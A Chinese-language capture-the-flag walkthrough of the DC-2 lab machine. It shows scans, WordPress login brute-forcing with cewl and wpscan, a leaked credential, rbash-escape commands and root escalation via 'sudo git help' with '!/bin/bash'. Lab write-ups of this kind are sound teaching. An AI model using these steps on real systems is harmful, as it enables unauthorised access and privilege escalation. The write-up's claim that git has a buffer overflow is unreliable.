一、信息收集
1、主机探测
arp-scan -l
探测同网段
2、端口扫描
nmap -sS -sV 192.168.66.136
80/tcp open http Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
这里是扫描出来两个端口,80和ssh,先扫一下目录然后访问80端口
3、目录扫描
二、外网打点
Flag1
这是我们扫描出来的目录,访问去看看
如果访问重定向报错记得在/etc/hosts中添加ip即可,在windows中的C:/Windows/System32/drivers/etc/HOSTS中添加ip dc-2即可成功
[15:46:20] 200 - 18KB - /index.php
[15:46:21] 200 - 7KB - /license.txt
[15:46:28] 200 - 3KB - /readme.html
[15:46:36] 200 - 0B - /wp-content/
[15:46:37] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[15:46:37] 200 - 0B - /wp-config.php
[15:46:37] 200 - 1B - /wp-admin/admin-ajax.php
[15:46:37] 200 - 528B - /wp-admin/install.php
[15:46:37] 200 - 4KB - /wp-includes/
[15:46:37] 200 - 1KB - /wp-login.php
[15:46:37] 200 - 0B - /wp-cron.php
在该目录下找到了Flag1,接着找下一个
Flag2
这里我们使用cewl爬了一个字典,估计是拿这个字典去爆登录页面
指纹扫出来时wp,使用wpsacn爆一下
结果爆出来了,admin、jerry、tom三个账户,我们把它放进一个txt中当作字典去爆
这里扫描除了账户对应密码,我们去看看
我们在jerry/adipiscing这组账户密码中得到了Flag2
到这里就要换方向了,我们去看ssh
Flag3
这里我们找到了flag3
不过这里我们遇到了-rbash,这个含义就是说我们的bash是不完整的,很多命令无法执行,无法操作,我们需要绕过
把/bin/bash给a变量,绕过首先的shellBASH_CMDS[a]=/bin/sh;a#使用并添加环境变量,将/bin 作为PATH环境变量导出export PATH=$PATH:/bin/ #将/usr/bin作为PATH环境变量导出export PATH=$PATH:/usr/bin
flag4
这里我们使用su jerry就能进入到jerry用户,这里tom写的环境变量需要等一等才能生效,在我这里如果执行了环境变量直接到jerry用户会报错。然后我们进入到jerry目录就能发现了flag4
Flag5
这里作者给了提示git提权 git提权的原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码既可以执行这条命令。以下有两种方法:
1、sudo git help config,然后在末行输入!/bin/bash或!'sh'完成提权。 2、sudo git -p help,然后输入!/bin/bash,即可打开一个root的shell。 不得不说这个靶场很经典,每个git提权都是以这台靶机作为实例
提权成功
最后在root目录下找到了最后一个flag
完结!!!